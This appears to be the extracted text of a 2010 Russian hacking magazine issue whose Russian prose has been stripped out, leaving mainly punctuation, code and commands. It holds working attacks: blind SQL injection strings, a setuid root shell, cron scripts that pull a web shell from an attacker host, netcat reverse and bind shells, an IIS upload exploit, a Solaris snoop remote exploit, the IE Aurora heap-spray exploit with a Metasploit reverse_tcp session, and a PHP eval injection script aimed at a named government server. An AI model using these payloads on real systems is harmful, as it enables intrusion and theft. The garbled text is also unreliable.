. rev2self , -
NT AUTHORITY\SYSTEM: ,
,
getsystem. , , , , .
ps :
meterpreter > ps
Process list
============
PID Name Arch User Path
--- ---- ---- ---- ---0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM
370 smss.exe x86 NT AUTHORITY\SYSTEM \
SystemRoot\System32\smss.exe
...
1558 explorer.exe x86 WINXPSP3\user C:\
WINDOWS\Explorer.EXE
...
, explorer.exe
PID=1560. ,
, ,
steal_token. PID :
meterpreter > steal_token 1558
Stolen token with username: WINXPSP3\user
Server username: WINXPSP3\user
Server username,
.
,
.
#GP ( nt!KiTrap).
-
. , BIOS',
32- x86-
16- .
16- (%windir% \
twunk_16.exe), NtVdmControl(),
Windows Virtual DOS Machine (aka
NTVDM),
#GP .
,
,
32- . 64-
16- .

?
Microsoft ,
.
.
, , , .
,
:)? z
X 03 /134/ 10
STEP TWITTER.COM/STEPAH

, 8 2005 ,
Google
Maps. , -
, .
,
, , ,
. :
API ,
,
, ,

Streets View.

360 .
, Google
, , ,
,
:). ...
,
- . ,

!-, Bird's Eye Microsoft Bing (www.bing.com/maps).
, ?
,

, , ,
, . Bird's Eye ( ) .
, 45
,
,
X 03 /134/ 10
,
, .
,
, ,
SimCity. ,
-!
- ,
GoogleStreet's,

DualMaps (www.mapchannels.
com/dualmaps.aspx). , API bing.com/
developers. ,
, ,
80 ,
Pictometry,
.
-, ,
SAS. (sasgis.
ru/sasplaneta),
, ,
Bing' .
,
Google, Yahoo (

Eniro: www.eniro.com). !
,
Googlebuildingmaker (sketchup.google.
com/3dwarehouse/buildingmaker),

3D- . ,
3D-?
!
,
,

. Google, ,
,
, 4-
, 3D-
(
). (,
) ,
GoogleEarth (earth.
google.com/intl/ru) .
.
, GoogleMaps, 5
, .
- Silverlight,
VirtualEarth,
:). z
035

Spyder spyder@antichat.net
komarov@itdefence.ru
Easy Hack
1
:
SQL-INJECTION
:
. , , ,
. , :
<?php
if(isset($_GET['id']) && $_GET['id']!=''){
$replaced = preg_replace(/,/,'',$_GET);
....
- $replaced
? union
select, 2- . , ,
. ,
substring(), mid(), ExtractValue(),
Qwazara
. ? SQL-, LIKE.
:
id=1 and version() like '4%'--
, , , 4*. :
id=1 and version() like '5%'--
, ,
id=1 and 1=1--
, . ,
, , .
information_schema.tables;
, ,
:
id=1 and (select 1 from information_schema.columns where
column_name like '%pass%' and table_name like 'u%')--
%pass% ,
table_name. ,
:
id=1 and (select 1 from information_schema.columns where
column_name like '%pass%' and table_name like 'us%')--
. , users
username, password,id. :
id=1 and (select 1 from users where id=1 and password like
'q%')--
. %
LIKE , q 1
.
:

BUFFER OVERFLOW
:
, , -
, .
, . ,
:
#include "stdio.h"
void return_input (char *s) {
char array[12];
strcpy(array,s);
printf("%s\n", array);
}
char text () {
printf("Example\n");
}
main ( int argc, char *argv[] ) {
036
text();
return_input(argv[1]);
return 0;
}
array 12
, . 30 :
spyder@l33t:~/c> ./bof AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAA
Example
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
(core dumped)
:
spyder@l33t:~/c> gdb bof core
............................
Core was generated by './bof AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA'.
X 03 /134/ 10
pcap-

Bindshell Windows
Vista/7
Program terminated with signal 11, Segmentation fault.

#0 0x41414141 in ?? ()
0x41 (A) ebp eip. eip , ,

. eip .
text() .
:
spyder@l33t:~/c> gdb bof
(gdb) disas main
Dump of assembler code for function main:
0x0804848d <main+0>: push %ebp
0x0804848e <main+1>: mov %esp,%ebp
0x08048490 <main+3>: and $0xfffffff0,%esp
0x08048493 <main+6>: sub $0x10,%esp
0x08048496 <main+9>: call 0x8048479 <text>
0x0804849b <main+14>: mov 0xc(%ebp),%eax
0x0804849e <main+17>: add $0x4,%eax
0x080484a1 <main+20>: mov (%eax),%eax
0x080484a3 <main+22>: mov %eax,(%esp)
0x080484a6 <main+25>: call 0x8048454 <return_input>
0x080484ab <main+30>: mov $0x0,%eax
0x080484b0 <main+35>: leave
0x080484b1 <main+36>: ret
text
0x08048496 <main+9>: call 0x8048479 <text>
0x08048496.
0x08048496.
12 , , 4
, ebp, , , 4 ,
eip. gcc ,
6 . :
:
,
:
sla.ckers.org
Paic , ,
NOT NULL. , ,
:
id=1 and (select * from users) = (1)
MySQL Operand should contain 7 column(s).

, users 7 . :
X 03 /134/ 10
char stuff[]= AAAAAAAAAAAAAAAAAAAAAAAA\x96\x84\x04\x08;

execlp("./bof","./bof",&stuff,NULL);
}
LIFO (Last In First Out, ),

. :
spyder@l33t:~/c> ./eip
Example
AAAAAAAAAAAAAAAAAAAAAAAA??
Example
, text() ,
, .
main () {
IP ,

id=1 and (1,2,3,4,5,6,7) = (select * from users union select

1,2,3,4,5,6,7 limit 1)
. ,
.
%0 , NOT NULL,
. :
id=1 and (1,2,3,4,5,6,7) =
(select * from users union select 1%0,2,3,4,5,6,7
limit 1)
Column id cannot be null.
037
:
, root.
- ,
PHP-. . :

system()
passthru()
exec()
shell_exec()
pcntl_exec()
eval()
: OpenSSH .
OpenSSH ShadOS, , , ,
. suid.c, :
,
:
assert()
preg_replace() c e
$a($b)
usort()

, -.
- , joomla, wordpress vbulletin,
. PHP .
, images ,
.jpg. .gif-!
.htaccess :
#include <stdio.h>
int main(int argc, char **argv){
system(argv[1]);
}
gcc suid.c -o suid. ( )

suid-. - , .
system().
suid-:
./suid id
uid=30(www) gid=30(www)
- :
chown 0:0 suid;chmod 4755 suid
AddType application/x-httpd-php .gif
www:
.gif- -.
, ?
/etc/shadow,
. ,
, ,
.
: SWEB
PETERHOST
:
, PHP- SQL-. .
038
./suid id
uid=30(www) gid=30(www) egid=0(root)
uid=30, !
/usr/bin.
1) union select.
Sweb $_GET-; POST, .
Peterhost $_GET, $_POST ,
; union select
, ,
. :
X 03 /134/ 10
reverse-shell Windows Vista/7
%09
%0a
%0b
%0c
%0d
:
, , //
. .
1) .
( cronshell.php) :
<?php
$file = /home/user/www/shell.php;
if(file_exists($file) == false) {
copy('http://www.h4x0r.com/shell.txt', $file);
}
?>
, , ,
. , , allow_url_fopen
On, system() wget.
2) .
index.php, . index.php
; , .
cronframe.php:
<?php
$frame = ' ';
$frame = preg_quote($file,'/');
$file = file_get_contents('/home/user/www/index.php');
preg_match($frame,$result,$file); //
if ($result == '') { //
system('rm /home/user/www/index.php); //
copy('http://www.h4x0r.com/index.txt', '/home/user/www/
index.php'); //
}
?>
3) .
X 03 /134/ 10
2) order by.
order by group by,
, , .
, oRdEr bY,
.
3) PHP-injection.
,
, /etc/passwd,
, /etc/
hosts.
<?php
$testfile = '/home/user/www/dors/sitemap.html'; //

if(file_exists($testfile) == false) { //
, ...
system('rm -rf /home/user/www/dors;mkdir /home/user/www/
dors');
copy('http://www.h4x0r.com/dors.tgz',
'/home/user/www/dors/'); //
system('tar xzf /home/user/www/dors/dors.tgz');
//
}
?>
, .
/home/user/ test:
SHELL=/bin/bash
MAILTO=user
0-59 * * * * /home/user/cron.php
: , - , , , ,
, /home/user/cron.php .
, :
crontab /home/user/test
! /var/spool/cron user
:
# DO NOT EDIT THIS FILE edit the master and reinstall.
# (/home/user/test installed on Mon Mar 29 02:31:34 2004)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37
vixie Exp $)
SHELL=/bin/bash
MAILTO=user
0-59 * * * * /home/user/cron.php
/home/user/cron.php .
039
, ,
FTP-
1. - .pcap:
tcpdump -w test.pcap -i eth1 tcp port 6881 or udp $ 33210 or
33220 $
:
NMAP, ,
. ,
.
.
: , FTP
:
,
.
!
, FTPXerox v1.0 (members.fortunecity.com/sektorsecurity/
:
NETCAT VISTA
:
, , .
powershell.exe,
cmd.exe , :).
BindShell:
nc -l -e powershell.exe -t -p 666
telnet localhost 666
ReverseShell:
nc -l -p 666
nc -e powershell.exe localhost 666
PowerShell.
, netcat,
:
function Trace-Port([int]$port=23,
[string]$IPAdress="127.0.0.1", [switch]$Echo=$false){
$listener = new-object System.Net.Sockets.
TcpListener([System.Net.IPAddress]::Parse($IPAdress), $port)
$listener.start()
[byte[]]$bytes = 0..255|%{0}
write-host "Waiting for a connection on port $port..."
$client = $listener.AcceptTcpClient()
write-host "Connected from $($client.Client.
040
2. rumint (rumint.org),

.
projects/ftpxerox.html). , - ,
.
, . ,
.
,
.

FTP. - .
RemoteEndPoint)"
$stream = $client.GetStream()
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$bytes[0..($i-1)]|%{$_}
if ($Echo){$stream.Write($bytes,0,$i)}
}
$client.Close()
$listener.Stop()
write-host "Connection closed."
}
:
PS> Trace-Port -ip 192.168.1.99 -port 333
Waiting for a connection on port 333...
Now script waiting for connection on port 333. I will connect to
this port using telnet.exe, and then write word "Test" into it:
Connected from 192.168.1.99:61829
84
101
115
116
13
10
Connection closed.
, test-, . z
X 03 /134/ 10

KOMAROV@ITDEFENCE.RU / IT DEFENCE.RU
, , ,
, . , , ,
- , .
. ,
.
CLIENTLESS VPN SSL
01
CISCO VPN SSL
BRIEF CISCO VPN SSL CISCO ASA CISCO, . VPN-,

.
EXPLOIT CISCO VPN Clientless ,
VPN
. . CISCO
, ,
, ,
.
,
/Intranet-, . ,
http://intranet. ,
:
1) ROT13 uggc://vagenarg.
2) ASCII- HEX
756767633a2f2f766167656e617267.
3) https://[CISCOVPNSSL]/+CSCO+0075676
7633a2f2f766167656e617267++.
! :
#!/bin/bash
echo -n "write URL:"
read a
b=ècho -n $a | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m]
[N-Z][A-M]' | od
-tx1 | cut -c8- | sed 's/ //g'` | paste -s -d '';
echo -n "URL "
042
CLIENTLESS CISCO VPN-
echo -n "https://[CISCOVPNSSL]/+CSCO+00";; echo -n $b;

echo -n "++";
echo "";
SOLUTION ACL- (webtype/

filter), Cisco Understanding Features
NotSupported in Clientless SSL VPN.
TARGETS Cisco ASA <= 8.x.
02

MICROSOFT IIS
BRIEF WEB- Microsoft.

ASP-
,
, . .
EXPLOIT IIS :
.asp;.gif, .asp;.jpg, .asp;.exe.
, ; .
, , , ,
(, ), WEB
X 03 /134/ 10
SHELLCODE'A ,
ASCII
- . Backtrack
,
(backtrack.it/~emgent/exploits/
IIS-asp.py):
XDOTOOL ,
. ,
./IIS-asp.py <image.jpg> < shellcode>
, - 0 shell_bind_
tcp, 1 meterpreter_bind_tcp, 2 vncinject_bind_tcp, ,
payloads Metasploit.
root@andrej:/tmp# ./IIS-asp.py image.jpg 0
image.asp;.jpg,
WEB-. , .
, , ,
(, images, avatars, uploads).
:
http://127.0.0.1/images/image.asp;.jpg
root@andrej:/tmp# nc -vv 10.12.6.6 31337
# Zerbion [10.12.6.6] 31337 (?) open
#
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# c:\windows\system32\inetsrv>whoami
> nt authority\network service
03

BLENDER
BRIEF Blender (blender.org) 3D- ,

, , !
,
. ,
( .blend) .
EXPLOIT Blender (Text Editor),
, New. , Python, :
import os
os.system("calc.exe")
Text Name (TX:Text.001) TX:myscript. Buttons

Window, (panel) Script,
, enable script links . New,
(myscript). OnLoad.
, User Preferences File Save.
TARGETS Blender 2.49b, Blender 2.40, Blender 2.35a, Blender 2.34.
SOLUTION .
SOLUTION ,
.
.blend- SDNA Scriptlink (http://www.
TARGETS Microsoft Internet Information Services (IIS) 5.x/6.x.

X 03 /134/ 10
043
,
- !
atmind.nl/blender/blender-sdna.html#struct:ScriptLink),
.
04
LINUX- SKYPE
BRIEF
Skype ( ). , ,
(design error). Linux, GUI-
QT (qt.nokia.com/products).
EXPLOIT
1. pseudo-XSS.
HTML - , . , ,

, , . "><h1><" ,
, . ? ,
, , , . ,
. ,
XSS, , ,
,
, , phishing-:
akep.ru">! .>

google.it, !
, .
, XSS-.
2. Denial Of Service 100%. xdotool (semicomplete.com/projects/xdotool)
.
044
Linux/FreeBSD, , , - .
, Windows (Automize).
Skype, xdotool ,
, :
sleep 5 && xdotool type "`perl -e "print 'S 'x44801"`" &&
xdotool key Return
sleep 5 && xdotool type 's/../' && xdotool type "`perl -e
"print 'S 'x44801"`" && xdotool type '/' && xdotool key
Return
, 0x44801 .
-
. .
SMS , 89601-.
TARGETS
<=2.1 Beta.
SOLUTION
.
05

SUN SOLARIS (SNOOP)
BRIEF snoop (docs.sun.com/app/docs/doc/819-2240/snoop1m?a=view) SUN Solaris. Snoop

, tcpdump/ethereal.
, , , ,
X 03 /134/ 10
WEB-
SOLARIS SNOOP !

. Wireshark:
CVE-2006-3627 GSM BSSMAP
CVE-2009-3243 TLS
CVE-2009-3550 DCERPC-
CVE-2009-3829 wiretap/
erf.c
, . - ,
,
. SMB-
(src/cmd/cmd-inet/usr.sbin/snoop/snoop_smb.c).
:
06
07
08
09
10
11
12
13
static void
interpret_negprot(int flags, uchar_t *data,
int len, char *xtra)
{
int length;
int bytecount;
char dialect[256];
...
protodata = (uchar_t *)data +
sizeof (struct smb);
X 03 /134/ 10
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
protodata++;
/* skip wordcount */
if (smbdata->flags & SERVER_RESPONSE) {

...
} else {
/*
* request packet:
* short bytecount;
* struct { char fmt; char name[]; } dialects
*/
bytecount = get2(protodata);
protodata += 2;
if (flags & F_SUM) {
while (bytecount > 1) {
length = sprintf(dialect,
(char *)protodata+1);
protodata += (length+2);
bytecount -= (length+2);
}
16, , , SMB ,
else (get2()).

(27), F_SUM.
(dialect) sprintf.
256 ,
.
045
, !
EXPLOIT milw0rm.org/
exploits/6328.
:
attack:/exploits# ./hoagie_snoop -t 192.168.0.1
* [*] attacking 'SunOS opensolaris 5.11 snv_86 i86pc i386
i86pc' on '192.168.0.1' ...
* [*] execute 'uname -a > /tmp/.patch.your.system.txt'
now ...
* [*] done
attack:/exploits#
, :
admin@opensolaris:~# snoop port 445
* Using device pcn0 (promiscuous mode)
* sh[1]: i??SMBr: not found [No such file or directory]
* WARNING: received signal 11 from packet 1
admin@opensolaris:~# cat /tmp/.patch.your.system.txt
* SunOS opensolaris 5.11 snv_86 i86pc i386 i86pc Solaris
admin@opensolaris:~#
046
46
!
, . :
01 s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
02 if (s == -1) {
03
printf("[*] failed to create raw socket\n");
04 } else {
05
sin.sin_family = AF_INET;
06
sin.sin_port = htons(port);
07
sin.sin_addr.s_addr = inet_addr(target);
08
09
if (!command) {
10
command = "uname -a > /tmp/.patch.your.system.txt";
11
}
12
13
printf("[*] attacking '%s' on '%s' ...\n",
targets[idx].description, target);

, , snprintf:
X 03 /134/ 10
4
5
buffer[i++] = SMB_HEADER_FILLER;
1
2
3
4
5
/*
buffer[i++] =
buffer[i++] =
buffer[i++] =
buffer[i++] =
length */
SMB_HEADER_FILLER;
SMB_HEADER_FILLER;
SMB_HEADER_FILLER;
SMB_HEADER_FILLER;
/* 4 */ ( , GCC )
2
3
4
5
buffer[i++]
buffer[i++]
buffer[i++]
buffer[i++]
=
=
=
=
SMB_HEADER_FILLER;
SMB_HEADER_FILLER;
SMB_HEADER_FILLER;
SMB_HEADER_FILLER;
1
2
3
4
5
/* ebp */
1
2
3
4
5
/* (system())*/
buffer[i++] = targets[idx].address & 0xff;
buffer[i++] = (targets[idx].address >> 8) & 0xff;
, :
01
02
03
printf("[*] execute '%s' now ...\n", command);

send_smb_packet(s, &sin, SMB_COMMAND_TRIGGER,
buffer);
04
05
printf("[*] done\n");
06
07
close(s);
08
}
09
10
return 0;
11 }
SMB 0X72
snprintf(buffer, sizeof(buffer), ";%s;",

command);
2
3
/* char dialect[256] */
4
for (i = strlen(buffer); i < 256; i++) { buffer[i]
= SMB_HEADER_FILLER; }
dialect .
EIP :
1
2
3
/* bytecount*/
X 03 /134/ 10
TARGETS
Sun Solaris 8/9/10.
OpenSolaris < snv_96.
SOLUTION

snprintf:
1
2
3
4
5
6
7
8
9
+
+
+
+
while (bytecount > 1)

{
length = sprintf(dialect, (char *)protodata+1);
length = snprintf(dialect, sizeof (dialect),
"%s", (char *)protodata+1);
protodata += (length+2);
if (protodata >= data+len)
break;
bytecount -= (length+2);
}
047

Step step@glc.ru
GOOGLE
.

GOOGLE, MCAFEE, ADOBE .
:). ,
, .
INTERNET EXPLORER,
, .
048
X 03 /134/ 10

,
.
,
(-), .
- IE,
Heap Spraying.
.
HEAP SPRAYING
, ,
Heap Spraying.
.
,
( IE)
- ,
.
0x7fffffff,

,
. Heap Spraying.
, , -
(- Heap), ?
.
(
, , ,
),
: . , ,
,
, ,
.
,
.
, ,
, -:

.
-, - ?
. , X 03 /134/ 10
NOP-,
, -.

NOP',
NOP ,
,
. NOP' -,
!
Heap
Spraying. :
? ,
,
.
JS-,
. ,
, ,

.
, ,
, Aurora,

.
JavaScript, , ,
. , ,
, JS-
.
:
<script>
var c = document
var b = "60 105 ... 62 14 10 "
var ss = b.split(" ");
var a = "a a a ... | } ~ "
var s=a.split(" ");
s[32]=" "
cc = ""
for(i=0;i<ss.length-1;i++) cc +=
s[ss[i].valueOf()-i%2];
var d = c.write
d(cc)
</script>

.
JS-
b.
,

,
a. , :
<html>
<script>
var sc = unescape("%u9090 [...]
6%ubfa8%u00d8");
var sss = Array(826, 679, [...]
413, 875);
var arr = new Array;
for (var i = 0; i < sss.length;
i ++ )
{
arr[i] = String.
fromCharCode(sss[i]/7);
}
var cc=arr.toString();cc=cc.
replace(/ ,/ g, "");
cc = cc.replace(/@/g, ",");
eval(cc);
var x1 = new Array();
for (i = 0; i < 200; i ++ ){
x1[i] = document.
createElement("COMMENT");
x1[i].data = "abc";
};
var e1 = null;
function ev1(evt){
e1 = document.
createEventObject(evt);
document.getElementById("sp1").
innerHTML = "";
window.setInterval(ev2, 50);
}
function ev2(){
p = "\u0c0d\ [...] \u0c0d";
for (i = 0; i < x1.length; i ++
)
{
x1[i].data = p;
};
var t = e1.srcElement;
049
IE ,
ECX
x[i] = n + sc;
}
INTERNET EXPLORER
}
</script>
<span id="sp1"><IMG SRC="aaa.gif"
onload="ev1(event)"></span>
</body></html>
HTTP://WWW
links

NOPslide:
www.phreedom.
org/solar/honeynet/
scan20/scan20.html.
Microsoft:
www.microsoft.com/
technet/security/
bulletin/MS10-002.
mspx.
WARNING
info
.

.
.
050
, Heap Spraying,
. n,
NOP- 0D 0C (, ,
,
). , NOP- n ... - sc.
,
, Heap
Spraying! , .
, , ,
,
. -
Internet Explorer, .
:
sc, - . ,
.
, sss.
var sss = Array(826, 679, [...] 413, 875);
var arr = new Array;
for (var i = 0; i < sss.length; i ++ )
{
arr[i] = String.fromCharCode(sss[i]/7);
}
var cc=arr.toString();cc=cc.replace(/ ,/ g,
"");
cc = cc.replace(/@/g, ",");
eval(cc);

: sss sss[i]/7,
fromCharCode
Unicode-. cc,
,
eval(cc) :
var n = unescape("%u0c0d%u0c0d");
while (n.length <= 524288)n += n;
n = n.substring(0, 524269 sc.length);
var x = new Array();
for (var i = 0; i < 200; i ++ ){
var x1 = new Array();

for (i = 0; i < 200; i ++ ){
x1[i] = document.createElement("COMMENT");
x1[i].data = "abc";
};
var e1 = null;
200 COMMENT,
.data abc.
, . ,
,

:
<span id="sp1"><IMG SRC="aaa.gif"
onload="ev1(event)"></span>
HTML- <span>,
<img>, aaa.gif (
). , , onload (,

),
ev1. , :
function ev1(evt){
e1 = document.createEventObject(evt);
document.getElementById("sp1").innerHTML
= "";
window.setInterval(ev2, 50);
}
-
event, X 03 /134/ 10
PYTHON !
!
onload <img>. :
innerHTML <span>.
<img>, ,
.
, ev2() 50 .
function ev2(){
p = "\u0c0d\ [...] \u0c0d";
for (i = 0; i < x1.length; i ++ )
{
x1[i].data = p;
};
}
</script>
, ! ,
x1 ,
COMMENT, . .data. p,
x1, ,
Heap Spraying.
? ! , ,
.data, ,
, . , ? ( !) <img>,
. , <img>
, , , .
(HEAP)
.
NOP No OPeration,
, .

, ,
. .
ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) .
,
,
.
X 03 /134/ 10
.data ,
, - (heap').
? , <img>! , <img> , .
, 0x0C 0x0D? :
0x0C0D0C0D,
-,
Heap Spraying'. , ,
. e1:
srcElement ,
e1. <img>,
span innerHTML. IE
- ,
. ,
0x0C0D0C0D, , , Heap Spraying'. :
-, .
GOOGLE?
Internet Explorer,
. (- Google
..), . -,
, Hex-Rays.
Svchost.exe .
HKEY_LOCAL_MACHINE\
System\CurrentControlSet\Services\, HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\
CurrentVersion\Svchost. SysIns.
%System%\rasmon.dll
serviceDLL , :
C:\Windows\System32\svchost.exe k SysIns
rasmon.dll . ,
,
, .
.
.
RaS[4 ] (, RaSxake),
serviceDLL netsvcs.
svchost.
W32.Downadup, -
051
METASPLOIT'
.
, ,
.
, , ,
.
-

, , , ,

.

Wepawet (wepawet.
iseclab.org).
Metasploit,

, ,
.
Metasploit
(www.metasploit.com/framework/download)
-
. ,

msfconsole,
.
ie_aurora,
IE, :
052
1. :
msf > use exploit/windows/
browser/ie_aurora
2. -, ..
,

.
backconnect (
):
msf exploit(ie_aurora) > set
PAYLOAD windows/meterpreter/
reverse_tcp
3. backconnect' ,

:
msf exploit(ie_aurora) > set
LHOST _IP
4. URIPATH
, HTML- (
):
msf exploit(ie_aurora) > set URIPATH /
5. , , :
msf exploit(ie_aurora) > exploit

IP-:
[*] Exploit running as background
job.
[*] Started reverse handler on
port 4444
[*] Local IP:
http://192.168.0.23:8080/
[*] Server started.
,
Internet Explorer 6 ( Windows
XP SP3)
, Local IP
(http://192.168.0.23:8080). ,
(backconnect'):
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1
opened (192.168.0.23:4444 ->
192.168.0.97:1514)
: . ,
,
, , :
msf exploit(ie_aurora) > sessions
-i 1
[*] Starting interaction with
1...
X 03 /134/ 10
HIGH ADRESS TO 0X7FFFFFFF
HIGH ADRESS TO 0X7FFFFFFF
OTHER STRUCTURES
OTHER STRUCTURES
JUMP HERE
3C0DFF7D
JUMP HERE
3C0DFF7D
Injected Heap
INVALID MEMORY
} NOP + SHELLCODE
Injected Heap
Injected Heap
Injected Heap
96AB0000
96AB0000
HEAP
OTHER STRUCTURES
HEAP SPRAY
LOW ADRESS TO 0X00000000
Injected Heapython'
Heap
OTHER STRUCTURES
HEAP SPRAY
LOW ADRESS TO 0X00000000
HEAP SPRAYING
NOP' + -
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version
5.1.2600]
(C) Copyright 1985-2001 Microsoft
Corp.
C:\Documents and Settings\Testlab\
Desktop>
! ,

Python' (praetorianprefect.com/wp-content/
uploads/2010/01/ie_aurora.py_.txt),
-
HTML : python ie_aurora.py [
].
-, (calc.exe).
IE6?
Internet Explorer.

IE8 . ,
Internet Explorer 8 ( , ) DEP (Data Execution Prevention)

. ,
,
.
X 03 /134/ 10

WEPAWET

DEP
,

. , security- Vupen
(www.vupen.com/exploits) ,
DEP IE8,
.
Microsoft, proof-of-concept , , Windows Vista
-
Address
Space Layout Randomization (ASLR).
: ? Aurora

, .

.
Hydraq. z
053

ARTEMBARANOV@YANDEX.RU

TDL3
, , , TDL3
TDSS.
,
. ,
TDL3,
.
rootkit.com diablonova
(rootkit.com/blog.php?newsid=970)

TDL, , ,
.
- ,
.
,
, -
; atapi.sys, disk.sys.
,
.
, .
atapi.sys,

. ,

.
IRP - atapi
: -
.
054
AV ,
,

. . -
DrWeb
Backdoor.Tdss.565 (aka TDL3) (drweb.
com/static/BackDoor.Tdss.565_(aka%20TDL3).
pdf), TDL3 .
.
thug4lif3 rootkit.com (rootkit.com/newsread.
php?newsid=979),
.
Rustock.C,
, TDL3

,

. TDL3
, ,
.
;
offensivecomputing.net malwarebytes.org,
, ,
.

, .
,
, , .
,
Windows XP SP3, , Windbg, , IDA .
non-debug , . ,
, debug .
,
debug out This is your life,
and it's ending one minute at a time.
DrWeb.
X 03 /134/ 10
-, Disable
acceleration for binary translation .
, tdss.565
.
, , ,
- - (
atapi.sys). , , !devstack \device\
harddisk0\dr0.
-.
- (
,
.reload atapi.sys).
:
kd> u f9756b3a l3
atapi!PortPassThroughZeroUnusedBuffer
s+0x34:
f9756b3a
mov eax,dword ptr ds:[FFDF0308h]
f9756b3f
jmp dword ptr [eax+0FCh]
f9756b45
add byte ptr [eax],al
, : TDL3

(,
IRP - ).

,
0xFFDF0308. -, ,
KUSER_SHARED_DATA, ,
(, ) . ,
.
.
struct _TAIL_PARAM_BLOCK
{
PVOID pTailInMem; //+0,

PVOID KernelBaseAddress; //+4,

PVOID MountedVFSDeviceObject; //
+8, atapi,

VFS
PVOID Unknown1; //+C
X 03 /134/ 10
ULONG TailDiskOffsLow;
//+10, ULONGLONG,

ULONG TailDiskOffsHigh; //+14
ULONG numOfValidSectorInHideArea;
//+18,
FAST_MUTEX FastMutex;//+1C
ULONG TailStartDiskSector;//+3C,
LBA
ULONG HideAreaStartSector;//+40,
LBA
UCHAR szBotId[36]; //+44,

ULONG Unknown2; //+68
ULONG Unknown3; //+6C
ULONG Unknown7; //+7C
ULONG Unknown10;//+88
ULONG OrigAtapiFuncs[0x1C];
//+8C, -
PVOID RootkitDispatchFunc;
//+FC, -
PVOID AtapiDriverObject; //+100

PVOID AtapiBootRootkitDevObj;
// +104, -
- ,
ULONG SectorSize; //+108
PVOID pKernel32_LoadLibraryExA;
//+10c,
ULONG cEntryInHideAreaTable;
//+110,
struct
{
ULONG SectorStart;
ULONG OffsFromSector;
ULONG RestoreDataSize;
PVOID pOrigData;
ULONG unknown;
}
HideAreaEntry[7]; //+114
ULONG unknown11[45];//+1A0
WCHAR DirSignature[9];//+254,

WCHAR DirFullPath[30];//+266,

...
}
, :
,
, ,
-.
.

IDA.
. -, .
TDL3,
055
DEVSTACK, - \DRIVER\
ATAPI DISK.SYS.

- ,
, ATAPI
, .
RootkitDispatchFunc
( 818e2e31) TDL3.
0x5E00
(
), ,
.writemem D:\1.bin 818df000
l5e00. :
- atapi.sys,
OrigAtapiFuncs
, , DiskExplorer.
m,
;
m poi(FFDF0308)+8C l70 81957548+38,
81957548 atapi.
atapi.sys
. , -
TDL3

,
. .
TDL3
056
DLL
EXPLORER
PEB
,
TailStartDiskSector.
, atapi.sys. -

,
,
.
,
, .
,
-
IRP . dd poi(FFDF0308)+fc
l1
, P.
VFS
, , ,
atapi,
IRP_MJ_INTERNAL_
DEVICE_CONTROL (aka IRP_MJ_SCSI).
create/
close ,
, FSD,

.
( )
/ PnP
. atapi.sys

create/close ,
STATUS_SUCCESS.
,
( ) ,
, , dll,
(
)
,
. ,
,
\Device\Ide\IdePortX, /
,
,
. , . VFS
white paper DrWeb,
, .
,
0x254
(DirSignature).
(DirFullPath) __ + _ (
\Device\Ide\IdePort1\
riyuicvp).
,
, Win32 API \Device\Ide\
IdePort1\riyuicvp\tdlwsp.dll. , , ,
dll,
PEB, .
, . ,
- ,
- FILE_DEVICE_
CONTROLLER, FS.

,
, -,
( HideAreaEntry).

callback- ,
,
.
,

.
(
). ,
,
. X 03 /134/ 10
0X384 ,

.
DriverStartIo DRIVER_OBJECT. , IRP-,
. -
IoStartPacket,
StartIo,
.
,

,

8198ACA2. 8198ACA28a243384=F774791E. <Alt-B>
,
1E 79 74 F7.
IRP ,
. : ,
atapi
VFS. ,
,

, .

,
,
.

, ,
. z
STARTIO -,
.
TDSS 3.20
TDL3
, . , ,
. -
atapi , fake-
- ,
, .

X 03 /134/ 10
057
GOV

. :
,
, .
, .

.
, .
,
, ,

. ,
,
, ,
(
)? ? ,
,
? :
, .
, , - .
Disturbed Perfect Insanity .

, 15400000 .

058
.
, The official site
2004, .
, , .
http://site/dir. ,
mode_rewrite,
: http://www.mon.gov.ua/main.
php?query=zno. ,
query query[],
- : ,
. ,
. ,
,
RFI. . ,

,
phpinfo. ,
Local File Inclusion,
-
.
:
http://www.mon.gov.ua/main.
php?query=main.php%00.
,
, . , ,
, .
LFI, Looped DoS.
.
,
. . ,
, ../?
FORBBIDEN.
,
/
proc/self/environ! POST-
User-Agent .
: http://www.mon.gov.ua/main.
php?query=../../../proc/self/environ%00. ,
. !
main.php?query=../../../proc/self/
fd/2%00
?
X 03 /134/ 10

PROOFLINK
[Sun Nov 15 07:41:42 2009] [error]

[client 92.249.112.225] client
denied by server configuration: /
usr/share/phpMyAdmin/
[Sun Nov 15 08:43:31 2009] [error]
[client 65.55.109.220] client
denied by server configuration: /
usr/share/phpMyAdmin/phpAdsNew,
referer: http://xxxx.us/album/
thumbnails.php?album=search&search
=releases
. ,
. ,
403 Forbbiden.
User-Agent ,
Referer, . ,
403.
,
phpMyAdmin. ,
: http://www.mon.gov.ua/
phpMyAdmin,
.
PHP Refereraa:
<?php
$server
=
'212.111.193.189';
$dir
= '/phpMyAdmin/';
$evilcode
= '<?php eval($_
REQUEST[ev]); ?>';
$header
= "GET "
.$dir. " HTTP/1.0\r\n";
$header
.= "Host: "
.$server. "\r\n";
$header
.= "Referer:
" .$evilcode. "\r\n";
$header
.=
"Connection: close\r\n\r\n";
$fp = fsockopen($server, 80);
if(!$fp) { die("[ X ] Connection
failed");} else { echo "[ ~ ]
Connection successful \r\n";}
if(fputs($fp,$header)) {echo "[
~ ] Data sended! \r\n";} else {
die("[ X ] Error While sending
headers!"); }
$result = fgets($fp, 128);
X 03 /134/ 10
if(strpos($result,'Forbidden'))
echo "[ ~ ] Successful! \r\n";
else die("[ X ] Failed!");
?>
,
, , ,
InetCrack, HttpREQ [x26]VOLAND, FireFox.
, ,
. , :
